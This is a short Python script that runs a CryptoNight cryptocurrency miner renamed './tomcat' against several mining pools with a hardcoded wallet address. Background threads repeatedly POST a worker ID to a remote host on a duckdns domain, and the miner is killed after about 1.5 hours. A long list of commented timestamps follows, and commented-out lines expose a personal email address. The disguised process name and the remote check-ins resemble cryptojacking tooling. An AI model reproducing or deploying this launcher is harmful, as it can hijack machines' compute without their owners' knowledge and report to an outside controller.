import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:34:08.154758
#2018-02-17 17:22:06.421561
#2018-02-17 19:11:03.895008
#2018-02-17 20:59:06.561534
#2018-02-17 22:45:03.364318
#2018-02-18 00:27:01.935920
#2018-02-18 02:17:06.747996
#2018-02-18 04:04:04.599887
#2018-02-18 05:54:05.396927
#2018-02-18 07:45:09.231987
#2018-02-18 09:32:07.199557
#2018-02-18 11:18:06.047202
#2018-02-18 13:04:05.932321
#2018-02-18 14:54:01.771059
#2018-02-18 16:42:07.395566
#2018-02-18 18:32:06.463166
#2018-02-18 20:19:06.618684
#2018-02-18 22:04:05.519941
#2018-02-18 23:53:05.905740
#2018-02-19 01:40:01.342761
#2018-02-19 03:28:01.516711
#2018-02-19 05:13:05.124398
#2018-02-19 06:59:06.577926
#2018-02-19 08:48:07.809672
#2018-02-19 10:38:04.945137
#2018-02-19 12:25:08.015231
#2018-02-19 14:12:04.621175
#2018-02-19 16:01:09.378767
#2018-02-19 17:49:02.130829
#2018-02-19 19:37:08.368442
#2018-02-19 21:24:07.926225
#2018-02-19 23:11:01.712306
#2018-02-20 00:56:06.443282
#2018-02-20 02:46:07.444372
#2018-02-20 04:34:06.811976
#2018-02-20 06:18:04.393677
#2018-02-20 08:03:02.208703
#2018-02-20 09:48:09.026331
#2018-02-20 11:32:08.391722
#2018-02-20 13:20:07.178799
#2018-02-20 15:04:06.116733
#2018-02-20 16:49:09.882086
#2018-02-20 18:37:08.452148
#2018-02-20 20:29:04.203499
#2018-02-20 22:14:02.043656
#2018-02-20 23:55:08.765620
#2018-02-21 01:40:07.369258
#2018-02-21 03:28:08.094740
#2018-02-21 05:16:04.217727
#2018-02-21 07:03:05.857065
#2018-02-21 08:48:07.070953
#2018-02-21 10:36:04.520393
#2018-02-21 12:24:05.088764
#2018-02-21 14:10:08.453222
#2018-02-21 15:55:10.845980
#2018-02-21 17:48:09.680412
#2018-02-21 19:34:07.488179
#2018-02-21 21:21:07.184455
#2018-02-21 23:07:07.252720
#2018-02-22 00:56:08.402064
#2018-02-22 02:43:06.289497
#2018-02-22 04:30:01.470931
#2018-02-22 06:15:05.594826
#2018-02-22 07:59:04.941463
#2018-02-22 09:48:06.840583
#2018-02-22 11:34:11.361383
#2018-02-22 13:21:08.144144
#2018-02-22 15:11:01.292413
#2018-02-22 16:54:02.032433
#2018-02-22 18:42:07.593272
#2018-02-22 20:33:08.077668
#2018-02-22 22:18:05.384751
#2018-02-23 00:05:09.389548
#2018-02-23 01:53:02.257039
#2018-02-23 03:44:01.846661
#2018-02-23 05:32:01.534761
#2018-02-23 07:18:06.276524
#2018-02-23 09:22:06.293351
#2018-02-23 11:28:04.268979
#2018-02-23 13:18:08.971100
#2018-02-23 15:05:06.808631
#2018-02-23 16:55:11.780056
#2018-02-23 18:44:01.808165
#2018-02-23 20:32:05.912776
#2018-02-23 22:19:04.112443
#2018-02-24 00:04:05.330231
#2018-02-24 01:56:07.835768
#2018-02-24 03:47:06.803956
#2018-02-24 05:34:03.568014
#2018-02-24 07:20:08.563238
#2018-02-24 09:10:05.528076
#2018-02-24 11:06:04.148503
#2018-02-24 12:54:07.601199
#2018-02-24 14:42:03.707660
#2018-02-24 16:33:06.232041
#2018-02-24 18:22:05.242881
#2018-02-24 20:08:07.478676
#2018-02-24 21:52:01.845468
#2018-02-25 00:52:06.301203
#2018-02-25 04:41:02.176282
#2018-02-25 08:38:01.666318